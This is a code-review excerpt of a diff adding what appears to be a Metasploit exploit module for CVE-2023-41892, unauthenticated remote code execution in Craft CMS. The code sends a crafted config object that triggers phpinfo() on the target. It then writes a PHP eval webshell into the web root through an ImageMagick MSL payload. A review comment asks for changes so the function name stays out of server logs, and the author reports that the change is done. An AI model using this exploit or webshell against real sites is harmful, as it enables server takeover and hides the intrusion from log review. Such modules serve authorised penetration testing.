modules/exploits/linux/http/craftcms_unauth_rce_cve_2023_41892.rb

```diff
@@ -0,0 +1,264 @@
+        }
+      )
+    )
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, 'Craft CMS base url', '/' ]),
+        OptString.new('WEBSHELL', [
+          false, 'The name of the webshell with extension .php. Webshell name will be randomly generated if left unset.', ''
+        ]),
+        OptEnum.new('COMMAND', [ true, 'Use PHP command function', 'passthru', [ 'passthru', 'shell_exec', 'system', 'exec' ]], conditions: %w[TARGET != 0])
+      ]
+    )
+  end
+
+  def check_phpinfo
+    # checks vulnerability running phpinfo() and returns upload_tmp_dir and DOCUMENT_ROOT
+    @config = { 'upload_tmp_dir' => nil, 'document_root' => nil }
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['TARGETURI']),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_post' => {
+        'action' => 'conditions/render',
+        'configObject[class]' => 'craft\elements\conditions\ElementCondition',
+        'config' => '{"name":"configObject","as ":{"class":"\\\GuzzleHttp\\\Psr7\\\FnStream", "__construct()":{"methods":{"close":"phpinfo"}}}}'
+      }
+    })
+    if res && res.body
+      # parse HTML to find the upload directory and the document root provided by phpinfo command output
+      html = res.get_html_document
+      if @config['upload_tmp_dir'].nil? || @config['document_root'].nil?
+        tr_items = html.css('tr td')
+        tr_items.each_with_index do |item, i|
+          if item.text =~ /upload_tmp_dir/i
+            if tr_items[i + 1].text =~ /no value/i
+              @config['upload_tmp_dir'] = '/tmp'
+            else
+              @config['upload_tmp_dir'] = tr_items[i + 1].text.strip
+            end
+          end
+          @config['document_root'] = tr_items[i + 1].text.strip if item.text =~ /\$_SERVER\['DOCUMENT_ROOT'\]/i
+        end
+      end
+      print_status(@config.to_s)
+    end
+  end
+
+  def upload_webshell
+    # randomize file name if option WEBSHELL is not set
+    if datastore['WEBSHELL'].blank?
+      @webshell_name = "#{Rex::Text.rand_text_alpha(8..16)}.php"
+    else
+      @webshell_name = datastore['WEBSHELL'].to_s
+    end
+
+    # select webshell depending on the target setting (PHP or others).
+    @post_param = Rex::Text.rand_text_alphanumeric(1..8)
+    @get_param = Rex::Text.rand_text_alphanumeric(1..8)
+
+    if target['Type'] == :php
+      # create the MSL payload
+      # payload = "<?php @eval(base64_decode($_POST[\'#{@post_param}\']));?>"
+      payload = <<~EOS
+        <?xml version="1.0" encoding="UTF-8"?>
+        <image>
+        <read filename="caption:&lt;?php @eval(base64_decode($_POST[\'#{@post_param}\'])); ?&gt;" />
+        <write filename="info:#{@config['document_root']}/#{@webshell_name}" />
+        </image>
+      EOS
+    else
+      # create the MSL payload
+      # payload = "<?=$_GET[\'#{@get_param}\'](base64_decode($_POST[\'#{@post_param}\']));?>"
```

Comment:
I think it would make sense to use another POST parameter, to avoid leaving the called function name in the httpd logs.

Reply:
Done. See https://github.com/rapid7/metasploit-framework/pull/18612/commits/4c404765a4c8c413445abf527789dfb589184828.